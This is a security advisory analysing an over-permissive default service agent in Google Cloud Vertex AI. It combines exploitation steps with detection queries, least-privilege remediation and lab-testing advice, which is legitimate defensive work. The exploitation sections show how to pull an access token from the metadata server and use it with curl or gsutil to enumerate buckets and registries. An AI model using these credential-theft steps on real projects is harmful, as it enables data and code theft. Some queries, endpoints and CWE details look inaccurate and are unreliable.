Vertex AI Vulnerability Exposes Google Cloud Data and Private Artifacts

Google Cloud Vertex AI Agent Misconfiguration Exposes Sensitive Data and Code
For General Readers (Journalistic Brief)
Security researchers have uncovered a significant flaw in Google Cloud's Vertex AI platform that could have exposed sensitive customer information and proprietary code. The issue stems from the default setup of AI agents, which were granted broader access than necessary for their tasks.
Think of it like giving a new employee a master key to your entire office building, including the executive suites and the secure vault, just so they can perform a single task in one room. This default configuration meant that if an attacker managed to compromise one of these AI agents, they could potentially use its extensive permissions to steal confidential business documents, customer lists, or other critical data stored within Google Cloud.
Even more concerning, this over-permissioning could have allowed attackers to download private code repositories. This is akin to stealing a company's most valuable intellectual property, its secret blueprints and internal strategies, providing a significant advantage to competitors or malicious actors.
While Google has since updated its guidance to help users secure these AI agents, this incident serves as a critical reminder for any organization leveraging cloud-based AI services. It underscores the paramount importance of carefully managing permissions, ensuring that AI tools and services only have access to the precise data and resources they absolutely need to function – a fundamental security principle known as "least privilege."
Technical Deep-Dive
1. Executive Summary
Palo Alto Networks Unit 42 has identified a critical security vulnerability within Google Cloud's Vertex AI platform, specifically related to the default Identity and Access Management (IAM) configuration of Per-Project, Per-Product Service Agents (P4SAs) used by AI agents. This default misconfiguration grants these agents excessive permissions, allowing a compromised or improperly managed AI agent to exfiltrate sensitive customer data from Google Cloud Storage (GCS) buckets and access private Google-owned Artifact Registry repositories. This could lead to the exposure of proprietary code and internal infrastructure details. Google has since updated its documentation and provided mitigation guidance, emphasizing the urgent need for the Principle of Least Privilege (PoLP) in AI agent deployments.
CVSS Score: Not publicly disclosed.
Affected Products: Google Cloud Vertex AI, specifically the Agent Engine's utilization of Per-Project, Per-Product Service Agents (P4SAs).
Severity Classification: Critical, due to the potential for extensive sensitive data exfiltration and intellectual property theft.
2. Technical Vulnerability Analysis
CVE ID and Details: No specific CVE ID has been publicly assigned or disclosed for this vulnerability as of the source publication date.
- Publication Date: March 31, 2026 (as per The Hacker News article referencing Palo Alto Networks Unit 42 research).
- Known Exploited Status: Not publicly disclosed.
- CVSS Metrics: Not publicly disclosed.
Root Cause (Code-Level): This vulnerability is fundamentally a configuration-based security flaw, not a traditional code exploit. The root cause is the default, overly permissive IAM role assignments to the Per-Project, Per-Product Service Agent (P4SA) utilized by Vertex AI agents deployed via the Agent Engine. The core weakness is the implicit trust and excessive permissions granted to these service agents by default, directly violating the Principle of Least Privilege (PoLP).
- CWE: This issue aligns with CWE-269: Improper Privilege Management and CWE-275: Class III Improper Access Control: Missing Authorization.
Affected Components:
- Google Cloud Vertex AI platform.
- Per-Project, Per-Product Service Agents (P4SAs) provisioned for Vertex AI Agent Engine deployments.
- Google Cloud Storage (GCS) buckets within customer projects.
- Private Google-owned Artifact Registry repositories.
Attack Surface:
- The Vertex AI Agent Engine's deployment mechanism for AI agents.
- The Google Cloud metadata service, which provides credentials and execution context to compute instances.
- The IAM policies governing the default P4SA roles.
3. Exploitation Analysis (Red-Team Focus)
Red-Team Exploitation Steps:
- Prerequisites: A Vertex AI agent must be deployed using the Agent Engine with the default P4SA configuration. The attacker must achieve initial code execution within the environment where the AI agent is running, or compromise the AI agent's application logic.
- Access Requirements: The attacker needs to be able to execute arbitrary code within the context of the compromised AI agent or its underlying execution environment. This can be achieved through:
- Compromised credentials for the GCP project hosting the agent.
- Exploitation of a vulnerability within the AI agent's application code, enabling arbitrary code execution.
- Lateral movement from another compromised resource within the same GCP project.
- Exploitation Steps:
- Upon achieving code execution within the agent's context, the attacker triggers the agent to query the Google Cloud metadata service.
- The metadata service endpoint (e.g.,
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token) is invoked to retrieve the P4SA's active access token. - The attacker then uses this retrieved P4SA access token to authenticate to the Google Cloud API.
- With the authenticated session, the attacker can enumerate and access GCS buckets within the customer's project (e.g., via
gsutil lsor equivalent API calls). - Similarly, the attacker can leverage the token to access private Artifact Registry repositories.
- Payload Delivery: The "payload" is not a traditional executable but the attacker's subsequent actions using the exfiltrated credentials and access. This includes data exfiltration, code theft, and further reconnaissance.
- Post-Exploitation:
- Data Exfiltration: Downloading sensitive data from GCS buckets.
- Intellectual Property Theft: Downloading proprietary container images or other artifacts from Artifact Registry.
- Reconnaissance: Mapping the GCP environment, identifying additional sensitive resources, or discovering further vulnerabilities.
- Lateral Movement: Potentially using the P4SA's permissions to access other services or resources within the project, or even cross-project if the P4SA has been granted such roles (though the report focuses on per-project scope).
What privileges are needed?
- Local/Remote: Local code execution within the AI agent's environment is necessary.
- Admin/User: Not necessarily administrative privileges on the host OS, but the capability to execute code that can initiate HTTP requests to the metadata service is critical.
- Pre-auth/Post-auth: This vulnerability is effectively post-authentication in the sense that the attacker must gain access to the AI agent's execution context. However, the P4SA itself is authenticated to Google Cloud via its service account credentials, which are implicitly exposed through the metadata service. The attacker exploits these pre-existing credentials.
Network Requirements?
- The AI agent's execution environment must have network connectivity to the Google Cloud metadata service endpoint (
metadata.google.internal). This is typically available within GCP compute environments. - The attacker's compromised environment must possess egress connectivity to Google Cloud APIs to effectively utilize the exfiltrated credentials.
- The AI agent's execution environment must have network connectivity to the Google Cloud metadata service endpoint (
Public PoCs and Exploits: No specific public PoC exploit names or URLs were provided in the source article. The research was detailed by Palo Alto Networks Unit 42.
Exploitation Prerequisites:
- Deployment of a Vertex AI agent using the Agent Engine.
- Utilization of the default Per-Project, Per-Product Service Agent (P4SA) without explicit permission hardening.
- Attacker must achieve code execution within the AI agent's operational environment.
Automation Potential: The process of querying the metadata service and subsequently using the obtained token to access resources is highly automatable using scripting languages (e.g., Python with Google Cloud SDK libraries, or
gsutilcommands). The attack is well-suited for automated data exfiltration once initial access is established. Worm-like propagation is unlikely unless the P4SA has cross-project permissions or the attacker can directly compromise other agents.Attacker Privilege Requirements:
- Unauthenticated: No.
- Low-privilege: Yes, if "low-privilege" refers to the ability to execute code within the AI agent's container or VM instance, which may not require root or administrative privileges on the underlying host.
- Admin: Not necessarily administrative privileges on the host, but the ability to interact with the GCP metadata service is paramount.
- Supply-chain position: Not directly, but if the AI agent itself is compromised via a supply-chain attack on its dependencies, that would represent an indirect attack vector.
Worst-Case Scenario:
- Confidentiality: Complete exfiltration of all sensitive data stored in GCS buckets within the affected project. This could encompass Personally Identifiable Information (PII), financial data, trade secrets, intellectual property, and operational logs.
- Integrity: While the primary impact described is read access, an attacker with P4SA credentials could potentially have write permissions if the default roles were even broader or if the attacker could chain this with other vulnerabilities. However, based on the report, the focus is on unauthorized read access.
- Availability: Not directly impacted by read-only access. However, if the attacker were to disrupt the AI agent's operations or utilize its compute resources for malicious purposes, availability could be indirectly affected. The theft of proprietary code could also impact Google's service availability and competitive standing.
4. Vulnerability Detection (SOC/Defensive Focus)
How to Detect if Vulnerable:
- Configuration Review: The primary detection method involves auditing the IAM policies applied to Vertex AI service accounts. Specifically, verify if the default P4SA is in use and if it has been granted roles beyond the minimum required (e.g.,
roles/storage.objectViewerandroles/artifactregistry.reader).- Command/Script:
This command lists all roles assigned to a specific service account. Identify roles that grant broad access (e.g.,# Example using gcloud CLI to list IAM policies for a service account # Replace 'YOUR_PROJECT_ID' and 'YOUR_SERVICE_ACCOUNT_EMAIL' gcloud projects get-iam-policy YOUR_PROJECT_ID \ --flatten="bindings[].members" \ --filter="bindings.members:serviceAccount:YOUR_SERVICE_ACCOUNT_EMAIL" \ --format="table(bindings.role, bindings.members)"roles/editor,roles/owner, or excessive read permissions across multiple services).
- Command/Script:
- Configuration Artifacts: Review IaC (Infrastructure as Code) templates such as Terraform, Pulumi, or CloudFormation used for deploying Vertex AI agents. Look for explicit definitions of service accounts and their IAM bindings. The absence of such explicit definitions, or reliance on default service accounts, indicates a potential vulnerability.
- Configuration Review: The primary detection method involves auditing the IAM policies applied to Vertex AI service accounts. Specifically, verify if the default P4SA is in use and if it has been granted roles beyond the minimum required (e.g.,
Indicators of Compromise (IOCs):
- File Hashes: Not directly applicable as this is not malware-based exploitation.
- Network Indicators:
- Unusual or high-volume traffic patterns from compute instances running Vertex AI agents to GCS API endpoints or Artifact Registry API endpoints.
- Access to GCS buckets or Artifact Registry repositories from IP addresses or service accounts not typically associated with those resources.
- Suspicious queries to the Google Cloud metadata service from unexpected processes or at anomalous times.
- Process Behavior Patterns:
- Processes on Vertex AI agent compute instances making HTTP requests to
metadata.google.internal. - Execution of
gsutilcommands or Google Cloud SDK client libraries for GCS or Artifact Registry from unexpected processes.
- Processes on Vertex AI agent compute instances making HTTP requests to
- Registry/Config Changes: Not directly applicable.
- Log Signatures:
- GCS Audit Logs: Entries indicating
storage.objects.list,storage.objects.getoperations performed by the P4SA against buckets it should not access. - Artifact Registry Audit Logs: Entries indicating
artifactregistry.repositories.list,artifactregistry.packages.list,artifactregistry.versions.list,artifactregistry.dockerimages.listoperations performed by the P4SA against repositories it should not access. - Cloud Logging (Metadata Service Access): Logs showing frequent or anomalous requests to the metadata service originating from the agent's compute instance.
- GCS Audit Logs: Entries indicating
SIEM Detection Queries:
1. KQL (Azure Sentinel/Microsoft Defender for Cloud) - Detecting Suspicious GCS Access from Vertex AI Instances:
// Detects GCS object listing or getting operations from a Vertex AI compute instance // that are not part of normal operational patterns or originate from unexpected service accounts. // Assumes Cloud Audit Logs for GCS are ingested. GCP_CLOUDAUDIT_RESOURCES | where Resource.type == "gcs_bucket" | where Operation.name has_any ("google.storage.v1.Storage.ListObjects", "google.storage.v1.Storage.GetObject") | extend CallerIdentity = tostring(protoPayload.authenticationInfo.principalEmail) | extend SourceInstance = tostring(protoPayload.requestMetadata.callerSuppliedIp) // May need adjustment based on log structure | extend TargetBucket = tostring(Resource.labels.bucket_name) | where CallerIdentity startswith "service-" // Filter for service accounts | where CallerIdentity contains "vertex-ai-agent" // Heuristic to identify potential P4SA | summarize count() by CallerIdentity, SourceInstance, TargetBucket, Operation.name, bin(TimeGenerated, 1h) | where count_ > 5 // Threshold for suspicious activity, adjust based on baseline | project TimeGenerated, CallerIdentity, SourceInstance, TargetBucket, OperationName=Operation.name, Count=count_Explanation: This query targets Google Cloud Audit Logs for GCS. It identifies
ListObjectsorGetObjectoperations performed by service accounts that appear to be associated with Vertex AI agents. Thecount_ > 5threshold (adjustable) flags instances with a high volume of such operations within an hour, potentially indicating unauthorized data access.2. SPL (Splunk) - Detecting Artifact Registry Access Anomalies:
index=gcp_audit_logs resource.type="artifactregistry.googleapis.com/Repository" operation.name IN ("google.devtools.containerregistry.v1.ContainerRegistry.ListImages", "google.devtools.containerregistry.v1.ContainerRegistry.GetImage") protoPayload.authenticationInfo.principalEmail=~"service-.*@.*.iam.gserviceaccount.com" | rex "service-(?P<ProjectNumber>\d+)@" | search protoPayload.authenticationInfo.principalEmail=~"vertex-ai-agent" OR protoPayload.authenticationInfo.principalEmail=~"p4sa" // Heuristic for P4SA identification | stats count by protoPayload.authenticationInfo.principalEmail, protoPayload.requestMetadata.callerSuppliedIp, resource.labels.repository_name, operation.name, bin(1h) | where count > 10 // Threshold for suspicious activity | project _time, CallerIdentity=protoPayload.authenticationInfo.principalEmail, SourceIp=protoPayload.requestMetadata.callerSuppliedIp, Repository=resource.labels.repository_name, Operation=operation.name, EventCount=countExplanation: This Splunk query focuses on Artifact Registry audit logs. It identifies operations related to listing or getting images performed by service accounts that are likely P4SAs. The
statscommand aggregates these events, and thewhere count > 10clause flags potential anomalous activity based on volume.Behavioral Indicators:
- Unusual Data Access Patterns: A Vertex AI agent attempting to access a large number of GCS objects, or objects outside its expected functional scope.
- Large Data Transfers: Significant outbound data transfer from the Vertex AI instance, especially to external destinations or unapproved GCS buckets.
- Artifact Registry Enumeration: Frequent calls to list repositories, packages, or images within Artifact Registry that are not directly related to the agent's task.
- Metadata Service Probing: Repeated, systematic queries to the metadata service from the agent's host, especially if not tied to legitimate agent operations.
- Execution of Cloud CLI Tools: Unexpected execution of
gsutil,gcloud, ordocker pullcommands from within the agent's environment.
5. Mitigation & Remediation (Blue-Team Focus)
Official Patch Information: Google has not released a traditional software patch. Mitigation is achieved through configuration changes and adherence to security best practices.
- Updated Documentation: Google has revised Vertex AI documentation to emphasize the Principle of Least Privilege (PoLP) for service accounts.
- Guidance for Custom Service Accounts: Recommendations are provided for creating and utilizing custom, least-privilege service accounts for Vertex AI agents.
- Patch Availability Date: Not applicable. Mitigation is configuration-based.
- Version Numbers that Fix: Not applicable.
Workarounds & Temporary Fixes:
- Immediate Action: Cease using the default Per-Project, Per-Product Service Agent (P4SA) for Vertex AI agents.
- Create Custom Service Accounts: For every Vertex AI agent deployment, provision a new, dedicated service account.
- Grant Minimal Permissions: Assign only the absolute minimum IAM roles required for the agent to perform its specific function.
- For GCS access: Grant
roles/storage.objectViewerfor read-only access. If write access is required, grantroles/storage.objectCreatororroles/storage.objectAdminonly to specific buckets, not all buckets in the project. - For Artifact Registry access: Grant
roles/artifactregistry.readerfor read-only access to specific repositories or artifacts.
- For GCS access: Grant
- Service Account Isolation: Ensure service accounts are scoped to the project they operate within, unless cross-project access is explicitly required and justified.
- Review Existing Deployments: Conduct an immediate audit of all existing Vertex AI agent deployments. Identify those utilizing default P4SAs and migrate them to custom, least-privilege service accounts.
- Network Segmentation (if applicable): While GCP's network is inherently secure, ensure that compute instances running Vertex AI agents are not unnecessarily exposed to public networks if not required.
Manual Remediation Steps (Non-Automated):
- Identify Vulnerable Deployments:
- Utilize the Google Cloud Console or
gcloudCLI to list all Vertex AI endpoints/agents. - For each agent, determine the service account it is configured to use.
- Query IAM policies for these service accounts to identify broad permissions.
# List all service accounts in a project gcloud iam service-accounts list --project=YOUR_PROJECT_ID # For each identified service account, list its IAM policies gcloud projects get-iam-policy YOUR_PROJECT_ID \ --flatten="bindings[].members" \ --filter="bindings.members:serviceAccount:SERVICE_ACCOUNT_EMAIL" \ --format="table(bindings.role, bindings.members)"
- Utilize the Google Cloud Console or
- Create a New Custom Service Account:
gcloud iam service-accounts create vertex-ai-agent-sa \ --display-name "Vertex AI Agent Custom SA" \ --project=YOUR_PROJECT_ID - Grant Least Privilege Roles:
- For GCS Read Access (specific bucket):
gcloud projects add-iam-policy-binding YOUR_PROJECT_ID \ --member="serviceAccount:vertex-ai-agent-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com" \ --role="roles/storage.objectViewer" \ --condition='expression=resource.name.startsWith("projects/_/buckets/YOUR_SPECIFIC_BUCKET_NAME"),title=bucket_access,description=Grant access only to specific bucket' - For Artifact Registry Read Access (specific repository):
gcloud artifacts repositories add-iam-policy-binding YOUR_REPOSITORY_NAME \ --location=YOUR_LOCATION \ --member="serviceAccount:vertex-ai-agent-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com" \ --role="roles/artifactregistry.reader"
- For GCS Read Access (specific bucket):
- Update Vertex AI Agent Configuration:
- Modify the Vertex AI agent deployment configuration to utilize the newly created
vertex-ai-agent-sa@YOUR_PROJECT_ID.iam.gserviceaccount.comservice account instead of the default P4SA. This step is highly dependent on the specific Vertex AI deployment method (e.g., SDK, Terraform, Console).
- Modify the Vertex AI agent deployment configuration to utilize the newly created
- Deprovision Old P4SA (with caution): After all agents have been migrated, consider disabling or deleting the default P4SA if it is no longer required for any legacy services. Caution: Ensure no other services depend on this default SA before deletion.
- Identify Vulnerable Deployments:
Risk Assessment During Remediation:
- Window of Exposure: The risk of exploitation persists until all vulnerable deployments are reconfigured.
- Operational Impact: Migrating service accounts may necessitate redeploying AI agents, potentially causing brief service interruptions if not carefully orchestrated.
- Configuration Errors: Incorrectly assigned new permissions could lead to functional issues for the AI agents or introduce new security gaps.
- Unidentified Deployments: If some Vertex AI agent deployments are missed during the audit, they will remain vulnerable.
6. Supply-Chain & Environment-Specific Impact
CI/CD Impact:
- Build Pipelines: If CI/CD pipelines are responsible for deploying Vertex AI agents, they must be updated to use custom service accounts with least privilege. A compromised CI/CD pipeline could deploy agents with default P4SAs, introducing the vulnerability.
- Artifact Repositories (npm, Docker, PyPI): This vulnerability directly impacts the security of container images stored in Artifact Registry, which are frequently used in CI/CD pipelines. Unauthorized access to these images could expose proprietary build tools, base images, or sensitive configurations.
Container/Kubernetes Impact:
- Docker: Vertex AI agents often operate within Docker containers. If the container runtime or the container image itself is compromised, an attacker could exploit the P4SA. Container isolation mechanisms (e.g., namespaces, cgroups) are crucial but can be bypassed if the underlying service account permissions are excessive.
- Kubernetes: If Vertex AI agents are deployed on Kubernetes, the Kubernetes service account used by the pod must be configured with minimal GCP IAM roles. The vulnerability resides in the GCP IAM role of the GCP service account that the Kubernetes service account is impersonating or bound to, not directly within Kubernetes RBAC itself. Container isolation effectiveness is contingent upon proper Kubernetes security configurations and the underlying GCP IAM policies.
Supply-Chain Implications:
- Weaponization: This vulnerability could be weaponized by adversaries to gain unauthorized access to sensitive customer data or Google's internal intellectual property.
- Dependency Management: The core issue is a misconfiguration in the default setup of a cloud service component (P4SA). It does not directly affect traditional dependency management tools like npm or PyPI. However, it highlights how misconfigurations in cloud infrastructure can create supply-chain-like risks. If an attacker could influence the deployment process of Vertex AI agents, they could ensure default P4SAs are utilized.
7. Advanced Technical Analysis
Exploitation Workflow (Detailed):
- Initial Access: Attacker gains code execution within the Vertex AI agent's execution environment (e.g., a Compute Engine VM or a GKE pod managed by Vertex AI). This could be achieved via a vulnerability in the agent's application code, a compromised dependency, or compromised credentials for the underlying compute resource.
- Metadata Service Interaction: The attacker-controlled code within the agent initiates an HTTP GET request to the instance metadata server:
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token. This request must include theMetadata-Flavor: Googleheader. - Credential Retrieval: The metadata server responds with a JSON payload containing an access token for the default P4SA.
{ "access_token": "ya29.c.0wB...<long_token>...", "expires_in": 3600, "token_type": "Bearer" } - API Authentication: The attacker uses this
access_tokento authenticate to Google Cloud APIs. This is typically done by including the token in theAuthorization: Bearer <access_token>header of API requests. - Resource Enumeration & Access:
- GCS: The attacker can now make authenticated calls to the GCS API. For example, to list all buckets in the project:
curl -H "Authorization: Bearer <access_token>" "https://storage.googleapis.com/storage/v1/b" - Artifact Registry: Similarly, authenticated calls can be made to the Artifact Registry API to list repositories, packages, and images. For example, to list repositories:
curl -H "Authorization: Bearer <access_token>" "https://us-central1-docker.pkg.dev/PROJECT_ID/list"(adjusting location and API endpoint as needed).
- GCS: The attacker can now make authenticated calls to the GCS API. For example, to list all buckets in the project:
- Data/Artifact Exfiltration: Using the retrieved token, the attacker proceeds to download specific objects from GCS or container images from Artifact Registry.
Code-Level Weakness: As previously stated, this is not a code-level vulnerability in the traditional sense. The "weakness" lies in the default IAM policy configuration applied by Google Cloud to the P4SA. The code that interacts with the metadata service is standard and intended, but it becomes a vector for abuse when the service account it represents has excessive permissions.
Related CVEs & Chaining:
- No directly related CVEs were mentioned in the source material.
- This vulnerability could potentially be chained with other vulnerabilities that grant initial code execution within the Vertex AI agent's environment. For instance, if an AI agent's application logic contained a deserialization vulnerability, an attacker could exploit that to gain code execution and subsequently leverage the P4SA's credentials.
- Similar vulnerabilities exist in other cloud environments where default service accounts or roles are overly permissive.
Bypass Techniques:
- WAF/IDS/EDR: Standard network security controls like WAFs, IDS, and EDRs would likely not detect the initial exploitation vector. This is because it involves legitimate API calls authenticated with valid (though misused) service account credentials. Traffic to the metadata service is internal to the GCP network. Subsequent API calls to GCS or Artifact Registry might be flagged if they exhibit unusual patterns (e.g., high volume, access to sensitive buckets), but the authentication itself is not inherently suspicious.
- Sandboxes: Sandboxes might detect the execution of
gsutilor other cloud CLI tools. However, they would require specific rules to flag calls to the metadata service or unusual GCS/Artifact Registry API patterns. The core issue is the excessive permission, not necessarily the execution of a known malicious binary.
8. Practical Lab Testing
Safe Testing Environment Requirements:
- A dedicated, isolated Google Cloud project.
- Network segmentation within GCP to prevent unintended access to other resources.
- A separate, non-production GCP project to simulate a customer environment.
- A controlled environment to deploy a Vertex AI agent (e.g., using a minimal example from Vertex AI documentation).
- Tools for monitoring GCP audit logs (e.g., Cloud Logging, SIEM).
How to Safely Test:
- Set up Isolated GCP Project: Create a new GCP project exclusively for testing purposes.
- Deploy a Test Vertex AI Agent: Utilize a simple, non-sensitive AI agent deployment. Crucially, ensure it is initially configured to use the default P4SA.
- Simulate Attacker Access: Within the agent's execution environment (e.g., a Jupyter notebook or a custom container), develop a script that:
- Makes an HTTP request to
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token. - Uses the retrieved token to attempt to list GCS buckets in the test project (e.g.,
gsutil ls). - Attempts to list Artifact Registry repositories in the test project.
- Makes an HTTP request to
- Monitor Logs: Observe Cloud Audit Logs for GCS, Artifact Registry, and general activity logs to track the attempted access.
- Remediation Test:
- Create a new, custom service account in the test project.
- Grant it only
roles/storage.objectViewerfor a specific test bucket androles/artifactregistry.readerfor a specific test repository. - Reconfigure the Vertex AI agent to use this custom service account.
- Re-execute the attacker script. Verify that unauthorized resource access is now blocked.
- Vulnerability Scan (Conceptual): Develop a script that queries IAM policies for service accounts associated with Vertex AI deployments and flags those with overly broad roles.
Test Metrics:
- Successful Unauthorized Access: Quantify the number of GCS buckets/objects or Artifact Registry artifacts accessed by the attacker script when using the default P4SA.
- Failed Unauthorized Access: Quantify the number of GCS buckets/objects or Artifact Registry artifacts that the attacker script fails to access after remediation.
- Time to Detect: Measure the time taken for logs to appear in the SIEM and for alerts to trigger for suspicious metadata service access or resource enumeration.
- Time to Remediate: Measure the time taken to create a custom service account, assign minimal roles, and reconfigure the Vertex AI agent.
9. Geopolitical & Attribution Context
- Is there evidence of state-sponsored involvement? No public evidence or reporting suggests state-sponsored involvement for this specific vulnerability. The analysis focuses on a technical misconfiguration.
- Targeted Sectors: Not applicable. The vulnerability affects any Google Cloud customer using Vertex AI with default P4SA configurations.
- Attribution Confidence: Currently unconfirmed.
- Campaign Context: Not publicly linked to any known threat actor campaigns.
- If unknown: Attribution is currently unconfirmed.
10. References & Sources
- Palo Alto Networks Unit 42 Research (as reported by The Hacker News).
- The Hacker News Article: "Vertex AI Service Agent Misconfiguration Exposes Customer Data, Code" (Published March 31, 2026).
- Google Cloud Documentation (updated post-discovery, specific URL not provided in source).
- NVD/CVE: No specific CVE ID publicly assigned as of source publication.
